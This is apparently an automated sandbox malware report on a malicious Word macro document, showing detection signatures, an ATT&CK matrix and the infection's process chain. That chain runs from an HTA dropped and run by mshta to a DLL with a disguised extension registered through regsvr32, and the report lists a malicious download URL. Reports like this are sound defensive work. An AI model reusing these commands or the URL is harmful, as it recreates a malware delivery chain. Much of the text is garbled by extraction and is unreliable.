Automated Malware Analysis Report For

ID: 401458 Sample Name: 25aabd25_by_Libranalysis.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 17:06:17 Date: 30/04/2021 Version: 32.0.0 Black Diamond Table of Contents

Table of Contents 2 Analysis Report 25aabd25_by_Libranalysis.docm 5 Overview 5 General Information 5 Detection 5 Signatures 5 Classification 5 Startup 5 Malware Configuration 5 Yara Overview 5 Sigma Overview 5 System Summary: 5 Signature Overview 5 AV Detection: 6 Software Vulnerabilities: 6 System Summary: 6 Data Obfuscation: 6 Mitre Att&ck Matrix 6 Behavior Graph 7 Screenshots 7 Thumbnails 7 Antivirus, Machine Learning and Genetic Malware Detection 8 Initial Sample 8 Dropped Files 8 Unpacked PE Files 8 Domains 8 URLs 8 Domains and IPs 10 Contacted Domains 10 Contacted URLs 10 URLs from Memory and Binaries 10 Contacted IPs 13 Public 14 Private 14 General Information 14 Simulations 15 Behavior and APIs 16 Joe Sandbox View / Context 16 IPs 16 Domains 16 ASN 16 JA3 Fingerprints 16 Dropped Files 16 Created / dropped Files 17 Static File Info 20 General 20 File Icon 20 Static OLE Info 21 General 21 OLE File "/opt/package/joesandbox/database/analysis/401458/sample/25aabd25_by_Libranalysis.docm" 21 Indicators 21 Summary 21 Document Summary 21 Streams with VBA 21 VBA File Name: ThisDocument.cls, Stream Size: 1307 21 General 21 VBA Code Keywords 22

Copyright Joe Security LLC 2021 Page 2 of 49 VBA Code 22 VBA File Name: arrayCopy.cls, Stream Size: 1490 22 General 22 VBA Code Keywords 22 VBA Code 23 VBA File Name: bufferTmpRequest.bas, Stream Size: 2002 23 General 23 VBA Code Keywords 23 VBA Code 23 VBA File Name: frm.frm, Stream Size: 1661 23 General 23 VBA Code Keywords 23 VBA Code 24 VBA File Name: indexPasteConvert.bas, Stream Size: 8002 24 General 24 VBA Code Keywords 24 VBA Code 26 Streams 26 Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 627 26 General 26 Stream Path: PROJECTwm, File Type: data, Stream Size: 188 26 General 26 Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4406 26 General 26 Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2428 26 General 26 Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 206 27 General 27 Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 532 27 General 27 Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156 27 General 27 Stream Path: VBA/dir, File Type: SVR2 executable (Amdahl-UTS) not stripped - version 8520192, Stream Size: 1117 27 General 27 Stream Path: frm/\x1CompObj, File Type: data, Stream Size: 97 28 General 28 Stream Path: frm/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 286 28 General 28 Stream Path: frm/f, File Type: data, Stream Size: 90 28 General 28 Stream Path: frm/o, File Type: data, Stream Size: 44 28 General 28 Network Behavior 29 Network Port Distribution 29 TCP Packets 29 UDP Packets 29 DNS Queries 31 DNS Answers 31 HTTP Request Dependency Graph 31 HTTP Packets 31 Code Manipulations 31 Statistics 31 Behavior 31 System Behavior 32 Analysis Process: WINWORD.EXE PID: 6116 Parent PID: 792 32 General 32 File Activities 32 File Created 32 File Deleted 33 File Written 33 File Read 41 Registry Activities 41 Key Created 41 Key Value Created 42 Key Value Modified 45 Analysis Process: explorer.exe PID: 6048 Parent PID: 6116 47 General 47 File Activities 47 File Created 47 Analysis Process: explorer.exe PID: 5316 Parent PID: 792 47 General 47 Registry Activities 47 Analysis Process: mshta.exe PID: 4804 Parent PID: 5316 48 General 48 File Activities 48 File Deleted 48 Registry Activities 48 Analysis Process: regsvr32.exe PID: 4864 Parent PID: 4804 48 General 48 Copyright Joe Security LLC 2021 Page 3 of 49 File Activities 49 File Read 49 Disassembly 49 Code Analysis 49

Overview

General Information Detection Signatures Classification

Sample 25aabd25_by_Libranalysis Name: .docm Muullltttiii AAVV SSccaannnneerrr ddeettteecctttiiioonn fffoorrr ssuubbm…

Analysis ID: 401458 OMffuffffiilictcie eA ddVoo cScuucmaneennettt rttt rrrdiiieesst e tttocot iccooonnn fvvoiiinrn csceue b vvmiii… MD5: 25aabd2540a1f7b… SOSiiifggfimceaa d ddoeecttteuecmcttteednd::t: RtRreieggsiii ssttottee rcrr oDDnLLvLLin wwceiiittth hv iss… SHA1: 85f6b809a81a361… DSDoiogccmuuma edenenttt e cccootnentdttaa:i iinRnsse aganins teemr DbbeLedLdd dweedidth VV sBB… Ransomware SHA256: efb29655c57e8dc… Miner Spreading DDooccuumeennttt ccoonntttaaiiinnss aann eembbeeddddeedd VVBB… Infos: mmaallliiiccciiioouusss DDooccuumeennttt ecexoxpnplltloaoiiittnt dsde eatttenec cetttemeddb ((e(ppdrrrodocecedes sVss…B malicious Evader Phishing

sssuusssppiiiccciiioouusss

suspicious Document exploit detected (process MDoaaccuhhmiiinnee n LLte eeaaxrrrpnnliioinnigtg d ddeeettteteeccctttetiiioodnn ( pfffoorrorr csseaasmspp… cccllleeaann Most interesting Screenshot: clean

CMCooannctthtaaiiininness Lcceaaappraanbbiniiillliigitttii ieedsse ttteooc ddtieoettntee cfcottt rvv isiirrratttuumaap… Exploiter Banker

CCrroreenaattatteeinss s aa c pparrrpooaccbeeislsistsi e iiinsn stsouu sdsppeeetenncddte evddi r mtuoao…

Spyware Trojan / Bot

DCDoroeccauutmesee nantt t p ccroonncttteaasiiinnss si n aa nsn u eesmpbebenedddededed dm VVoBB… Adware Score: 80 Range: 0 - 100 DDooccuumeennttt ccoonntttaaiiinnss aann eembbeeddddeedd VVBB…

Whitelisted: false DDooccuumeennttt ccoonntttaaiiinnss eaemn bebemeddbddeeedddd VeVdBB AVA B … Confidence: 100% DDooccuumeennttt ccoonntttaaiiinnss nenomo ObeLLdEEd sestdttrrre eVaaBmA …

DDooccuumeennttt hchaoasns t aaninn usu nnkkonn oOowwLnEn aasptprppelllaiiiccmaatt tiii…

MDoocnnuiiitttmoorrressn ccte ehrrratttaasiii nna nrrree uggniiissktttnrrryyo wkkeenyy ass p /// p vvlaiaclllauut…i

PMPootttneeinntotttiiiraaslll dcdeoorcctuaumine ernenttgt eiesxxtprpylllo okiiittet dydese ttt/ee vccattteeludd… Startup PPoottteenntttiiiaalll ddooccuumeennttt eexxpplllooiiittt ddeettteeccttteedd…

PPoottteenntttiiiaalll ddooccuumeennttt eexxpplllooiiittt ddeettteeccttteedd… System is w10x64 WINWORD.EXE (PID: 6116 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINQPWouuteOerrrnRiiieetDissa . lttEt hhdXeeo E cvvu'o o/mllAluuemunteoet m eiiinnxafffpotoilrorromnit a a-dtEttieiioomtnenb c (((entnedaaddmin…g MD5: 0B9AB9B9C4DE429473D6450D4297A123) explorer.exe (PID: 6048 cmdline: explorer c:\users\public\valuePasteList.hta MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7) SQSeeuaaerrrcciehhsee stsh fffeoo rrrv ttothhleue m Meiiic cirnrroofsosoromfffttt a Otiuouttntllloo (oonkka fmff… explorer.exe (PID: 5316 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D) mshta.exe (PID: 4804 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\vTSTarreriliieuaesersc P ttthooae slllsoot eaafoLddri s mtth.iihisests saMiiin'n i{gcg1 r DEoDs4LLo6LLf0sst BODu7tl-oFo1kC f3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3- 4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A) Tries to load missing DLLs regsvr32.exe (PID: 4864 cmdline: 'C:\Windows\System32\regsvr32.exe' c:\users\pUuTUbrssileeicss\ vataoa k lklunoneoaoPwdwa nmns twiweseLsebiibns btgb.rj rrpDoogwLw LsMseseDrrr 5uu:ss 4ee2rrr 6aaEgge7e…499F6A7346F0410DEAD0805586B) cleanup UUsseess caco okddneeo owobbnfff uuwsseccbaa tttbiiioornon w ttteesccehhrn nuiiiqsqueuere sas g (((…e

Uses code obfuscation techniques (

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Register DLL with spoofed extension

Signature Overview

Copyright Joe Security LLC 2021 Page 5 of 49 • AV Detection • Compliance • Software Vulnerabilities • Networking • System Summary • Data Obfuscation • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document contains an embedded VBA macro with suspicious strings

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Mitre Att&ck Matrix

Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Scripting 2 2 DLL Side- Process Masquerading 1 OS Query Registry 1 Remote Email Exfiltration Ingress Tool Eavesdrop on Accounts Loading 1 Injection 1 2 Credential Services Collection 1 Over Other Transfer 1 Insecure Dumping Network Network Medium Communication Default Exploitation for Boot or DLL Side- Disable or Modify LSASS Security Software Remote Data from Exfiltration Non- Exploit SS7 to Accounts Client Logon Loading 1 Tools 1 Memory Discovery 1 1 Desktop Removable Over Application Redirect Phone Execution 1 3 Initialization Protocol Media Bluetooth Layer Calls/SMS Scripts Protocol 2 Domain At (Linux) Logon Script Logon Script Virtualization/Sandbox Security Virtualization/Sandbox SMB/Windows Data from Automated Application Exploit SS7 to Accounts (Windows) (Windows) Evasion 1 Account Evasion 1 Admin Shares Network Exfiltration Layer Track Device Manager Shared Protocol 1 2 Location Drive Local At (Windows) Logon Script Logon Script Process NTDS Process Discovery 1 Distributed Input Scheduled Protocol SIM Card Accounts (Mac) (Mac) Injection 1 2 Component Capture Transfer Impersonation Swap Object Model Cloud Cron Network Network Scripting 2 2 LSA Remote System SSH Keylogging Data Fallback Manipulate Accounts Logon Script Logon Script Secrets Discovery 1 Transfer Channels Device Size Limits Communication

Replication Launchd Rc.common Rc.common Obfuscated Files or Cached File and Directory VNC GUI Input Exfiltration Multiband Jamming or Through Information 1 1 Domain Discovery 1 Capture Over C2 Communication Denial of Removable Credentials Channel Service Media Copyright Joe Security LLC 2021 Page 6 of 49 Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects External Scheduled Task Startup Startup Items DLL Side-Loading 1 DCSync System Information Windows Web Portal Exfiltration Commonly Rogue Wi-Fi Remote Items Discovery 1 3 Remote Capture Over Used Port Access Points Services Management Alternative Protocol

Behavior Graph

Hide Legend Behavior Graph

ID: 401458 Legend: Sample: 25aabd25_by_Libranalysis.docm Process Startdate: 30/04/2021 Architecture: WINDOWS Signature Score: 80 Created File DNS/IP Info Office document tries to convince victim to Multi AV Scanner detection Sigma detected: Register Is Dropped disable security protection 4 other signatures started started for submitted file DLL with spoofed extension (e.g. to enable ActiveX or Macros) Is Windows Process

Number of created Registry Values

WINWORD.EXE explorer.exe Number of created Files

Visual Basic 184 47 3 Delphi

Java 192.168.2.1 dropped dropped unknown .Net C# or VB.NET unknown C, C++ or other language started started Is malicious

C:\...\25aabd25_by_Libranalysis.docm.LNK, MS C:\Users\Public\valuePasteList.hta, HTML Internet

explorer.exe mshta.exe

1 1 22

hesterhumora.com

193.203.203.235, 49718, 80 started SEAP-AGEES Russian Federation

regsvr32.exe

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Initial Sample

Source Detection Scanner Label Link 25aabd25_by_Libranalysis.docm 13% ReversingLabs Script- Macro.Packed.Generic 25aabd25_by_Libranalysis.docm 100% Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source Detection Scanner Label Link https://cdn.entity. 0% URL Reputation safe https://cdn.entity. 0% URL Reputation safe

Copyright Joe Security LLC 2021 Page 8 of 49 Source Detection Scanner Label Link https://cdn.entity. 0% URL Reputation safe https://cdn.entity. 0% URL Reputation safe hesterhumora.com/dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6? 0% Avira URL Cloud safe vc=4eyoNNPxt2YQ https://powerlift.acompli.net 0% URL Reputation safe https://powerlift.acompli.net 0% URL Reputation safe https://powerlift.acompli.net 0% URL Reputation safe https://powerlift.acompli.net 0% URL Reputation safe https://rpsticket.partnerservices.getmicrosoftkey.com 0% URL Reputation safe https://rpsticket.partnerservices.getmicrosoftkey.com 0% URL Reputation safe https://rpsticket.partnerservices.getmicrosoftkey.com 0% URL Reputation safe https://rpsticket.partnerservices.getmicrosoftkey.com 0% URL Reputation safe https://cortana.ai 0% URL Reputation safe https://cortana.ai 0% URL Reputation safe https://cortana.ai 0% URL Reputation safe https://cortana.ai 0% URL Reputation safe hesterhumora.com/dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6? 0% Avira URL Cloud safe vc=4eyoNNPxt2YQPjsp3&OUMP=Aa93N&user=MYqjfAOnpCOmZrUkdR https://api.aadrm.com/ 0% URL Reputation safe https://api.aadrm.com/ 0% URL Reputation safe https://api.aadrm.com/ 0% URL Reputation safe https://api.aadrm.com/ 0% URL Reputation safe https://ofcrecsvcapi-int.azurewebsites.net/ 0% Virustotal Browse https://ofcrecsvcapi-int.azurewebsites.net/ 0% Avira URL Cloud safe https://res.getmicrosoftkey.com/api/redemptionevents 0% URL Reputation safe https://res.getmicrosoftkey.com/api/redemptionevents 0% URL Reputation safe https://res.getmicrosoftkey.com/api/redemptionevents 0% URL Reputation safe https://res.getmicrosoftkey.com/api/redemptionevents 0% URL Reputation safe https://powerlift-frontdesk.acompli.net 0% URL Reputation safe https://powerlift-frontdesk.acompli.net 0% URL Reputation safe https://powerlift-frontdesk.acompli.net 0% URL Reputation safe https://powerlift-frontdesk.acompli.net 0% URL Reputation safe https://officeci.azurewebsites.net/api/ 0% Avira URL Cloud safe https://store.office.cn/addinstemplate 0% URL Reputation safe https://store.office.cn/addinstemplate 0% URL Reputation safe https://store.office.cn/addinstemplate 0% URL Reputation safe https://store.officeppe.com/addinstemplate 0% URL Reputation safe https://store.officeppe.com/addinstemplate 0% URL Reputation safe https://store.officeppe.com/addinstemplate 0% URL Reputation safe https://dev0-api.acompli.net/autodetect 0% URL Reputation safe https://dev0-api.acompli.net/autodetect 0% URL Reputation safe https://dev0-api.acompli.net/autodetect 0% URL Reputation safe https://www.odwebp.svc.ms 0% URL Reputation safe https://www.odwebp.svc.ms 0% URL Reputation safe https://www.odwebp.svc.ms 0% URL Reputation safe https://dataservice.o365filtering.com/ 0% URL Reputation safe https://dataservice.o365filtering.com/ 0% URL Reputation safe https://dataservice.o365filtering.com/ 0% URL Reputation safe https://officesetup.getmicrosoftkey.com 0% URL Reputation safe https://officesetup.getmicrosoftkey.com 0% URL Reputation safe https://officesetup.getmicrosoftkey.com 0% URL Reputation safe https://prod-global-autodetect.acompli.net/autodetect 0% URL Reputation safe https://prod-global-autodetect.acompli.net/autodetect 0% URL Reputation safe https://prod-global-autodetect.acompli.net/autodetect 0% URL Reputation safe https://ncus.contentsync. 0% URL Reputation safe https://ncus.contentsync. 0% URL Reputation safe https://ncus.contentsync. 0% URL Reputation safe https://apis.live.net/v5.0/ 0% URL Reputation safe https://apis.live.net/v5.0/ 0% URL Reputation safe https://apis.live.net/v5.0/ 0% URL Reputation safe https://wus2.contentsync. 0% URL Reputation safe https://wus2.contentsync. 0% URL Reputation safe https://wus2.contentsync. 0% URL Reputation safe https://asgsmsproxyapi.azurewebsites.net/ 0% Avira URL Cloud safe https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile 0% URL Reputation safe Copyright Joe Security LLC 2021 Page 9 of 49 Source Detection Scanner Label Link https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile 0% URL Reputation safe https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile 0% URL Reputation safe https://ncus.pagecontentsync. 0% URL Reputation safe https://ncus.pagecontentsync. 0% URL Reputation safe https://ncus.pagecontentsync. 0% URL Reputation safe https://skyapi.live.net/Activity/ 0% URL Reputation safe https://skyapi.live.net/Activity/ 0% URL Reputation safe https://skyapi.live.net/Activity/ 0% URL Reputation safe https://dataservice.o365filtering.com 0% URL Reputation safe https://dataservice.o365filtering.com 0% URL Reputation safe https://dataservice.o365filtering.com 0% URL Reputation safe https://api.cortana.ai 0% URL Reputation safe https://api.cortana.ai 0% URL Reputation safe https://api.cortana.ai 0% URL Reputation safe https://ovisualuiapp.azurewebsites.net/pbiagave/ 0% Avira URL Cloud safe https://directory.services. 0% URL Reputation safe https://directory.services. 0% URL Reputation safe https://directory.services. 0% URL Reputation safe

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation hesterhumora.com 193.203.203.235 true false unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation false Avira URL Cloud: safe unknown hesterhumora.com/dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6 ?vc=4eyoNNPxt2YQPjsp3&OUMP=Aa93N&user=MYqjfAOnpCOmZrUkdR

URLs from Memory and Binaries

Name Source Malicious Antivirus Detection Reputation https://api.diagnosticssdf.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://login.microsoftonline.com/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://shell.suite.office.com:1443 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://login.windows.net/72f988bf-86f1-41af-91ab- 51FE3752-6560-4F0C-ADCF-098B90 false high 2d7cd011db47/oauth2/authorize 28BD48.0.dr https://autodiscover-s.outlook.com/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://insertmedia.bing.office.net/images/officeonlinecontent/b 28BD48.0.dr rowse?cp=Flickr https://cdn.entity. 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe URL Reputation: safe https://api.addins.omex.office.net/appinfo/query 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://clients.config.office.net/user/v1.0/tenantassociationkey 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ 28BD48.0.dr mshta.exe, 00000004.00000003.2 false Avira URL Cloud: safe unknown hesterhumora.com/dgsos/75632/esKeMcrysdSzRdoJ4pQ1Hw 30474725.0000000005F47000.0000 yTQMok5TG/51252/27076/law6?vc=4eyoNNPxt2YQ 0004.00000001.sdmp, mshta.exe, 00000004.00000003.231986881.0 00000000A4AB000.00000004.00000 001.sdmp

Copyright Joe Security LLC 2021 Page 10 of 49 Name Source Malicious Antivirus Detection Reputation https://powerlift.acompli.net 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe URL Reputation: safe https://rpsticket.partnerservices.getmicrosoftkey.com 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe URL Reputation: safe https://lookup.onenote.com/lookup/geolocation/v1 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://cortana.ai 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe URL Reputation: safe 51FE3752-6560-4F0C-ADCF-098B90 false high https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/get 28BD48.0.dr freeformspeech https://cloudfiles.onenote.com/upload.aspx 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://syncservice.protection.outlook.com/PolicySync/PolicyS 28BD48.0.dr ync.svc/SyncFile https://entitlement.diagnosticssdf.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://na01.oscs.protection.outlook.com/api/SafeLinksApi/Get 28BD48.0.dr Policy https://api.aadrm.com/ 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe URL Reputation: safe https://ofcrecsvcapi-int.azurewebsites.net/ 51FE3752-6560-4F0C-ADCF-098B90 false 0%, Virustotal, Browse unknown 28BD48.0.dr Avira URL Cloud: safe 51FE3752-6560-4F0C-ADCF-098B90 false high https://dataservice.protection.outlook.com/PsorWebService/v1 28BD48.0.dr /ClientSyncFile/MipPolicies https://api.microsoftstream.com/api/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://insertmedia.bing.office.net/images/hosted? 51FE3752-6560-4F0C-ADCF-098B90 false high host=office&adlt=strict&hostType=Immersive 28BD48.0.dr https://cr.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://portal.office.com/account/?ref=ClientMeControl 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://ecs.office.com/config/v2/Office 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://graph.ppe.windows.net 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://res.getmicrosoftkey.com/api/redemptionevents 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe URL Reputation: safe https://powerlift-frontdesk.acompli.net 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe URL Reputation: safe https://tasks.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://officeci.azurewebsites.net/api/ 51FE3752-6560-4F0C-ADCF-098B90 false Avira URL Cloud: safe unknown 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://sr.outlook.office.net/ws/speech/recognize/assistant/wor 28BD48.0.dr k https://store.office.cn/addinstemplate 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://outlook.office.com/autosuggest/api/v1/init?cvid= 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://globaldisco.crm.dynamics.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/g 28BD48.0.dr etfreeformspeech https://store.officeppe.com/addinstemplate 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe

Copyright Joe Security LLC 2021 Page 11 of 49 Name Source Malicious Antivirus Detection Reputation https://dev0-api.acompli.net/autodetect 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://www.odwebp.svc.ms 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://api.powerbi.com/v1.0/myorg/groups 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://web.microsoftstream.com/video/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://graph.windows.net 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://dataservice.o365filtering.com/ 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://officesetup.getmicrosoftkey.com 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://analysis.windows.net/powerbi/api 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://prod-global-autodetect.acompli.net/autodetect 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe 51FE3752-6560-4F0C-ADCF-098B90 false high https://outlook.office365.com/autodiscover/autodiscover.json 28BD48.0.dr https://powerpoint.uservoice.com/forums/288952- 51FE3752-6560-4F0C-ADCF-098B90 false high powerpoint-for-ipad-iphone-ios 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/get 28BD48.0.dr freeformspeech 51FE3752-6560-4F0C-ADCF-098B90 false high https://pf.directory.live.com/profile/mine/System.ShortCircuitPr 28BD48.0.dr ofile.json https://ncus.contentsync. 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe

https://onedrive.live.com/about/download/? 51FE3752-6560-4F0C-ADCF-098B90 false high windows10SyncClientInstalled=false 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://webdir.online.lync.com/autodiscover/autodiscoverservic 28BD48.0.dr e.svc/root/ weather.service.msn.com/data.aspx 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://apis.live.net/v5.0/ 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://officemobile.uservoice.com/forums/929800-office- 51FE3752-6560-4F0C-ADCF-098B90 false high app-ios-and-ipad-asks 28BD48.0.dr https://word.uservoice.com/forums/304948-word-for- 51FE3752-6560-4F0C-ADCF-098B90 false high ipad-iphone-ios 28BD48.0.dr https://autodiscover- 51FE3752-6560-4F0C-ADCF-098B90 false high s.outlook.com/autodiscover/autodiscover.xml 28BD48.0.dr https://management.azure.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://wus2.contentsync. 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://incidents.diagnostics.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://clients.config.office.net/user/v1.0/ios 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://insertmedia.bing.office.net/odc/insertmedia 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://o365auditrealtimeingestion.manage.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://outlook.office365.com/api/v1.0/me/Activities 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://api.office.net 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://incidents.diagnosticssdf.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://asgsmsproxyapi.azurewebsites.net/ 51FE3752-6560-4F0C-ADCF-098B90 false Avira URL Cloud: safe unknown 28BD48.0.dr https://clients.config.office.net/user/v1.0/android/policies 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr

Copyright Joe Security LLC 2021 Page 12 of 49 Name Source Malicious Antivirus Detection Reputation https://entitlement.diagnostics.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json 28BD48.0.dr https://outlook.office.com/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://storage.live.com/clientlogs/uploadlocation 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://templatelogging.office.com/client/log 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://outlook.office365.com/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://webshell.suite.office.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://insertmedia.bing.office.net/images/officeonlinecontent/b 28BD48.0.dr rowse?cp=OneDrive https://management.azure.com/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://login.windows.net/common/oauth2/authorize 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown https://dataservice.o365filtering.com/PolicySync/PolicySync.sv 28BD48.0.dr URL Reputation: safe c/SyncFile URL Reputation: safe https://graph.windows.net/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://api.powerbi.com/beta/myorg/imports 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://devnull.onenote.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://ncus.pagecontentsync. 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe 51FE3752-6560-4F0C-ADCF-098B90 false high https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig 28BD48.0.dr .json https://messaging.office.com/ 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://dataservice.protection.outlook.com/PolicySync/PolicySy 28BD48.0.dr nc.svc/SyncFile https://augloop.office.com/v2 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr 51FE3752-6560-4F0C-ADCF-098B90 false high https://insertmedia.bing.office.net/images/officeonlinecontent/b 28BD48.0.dr 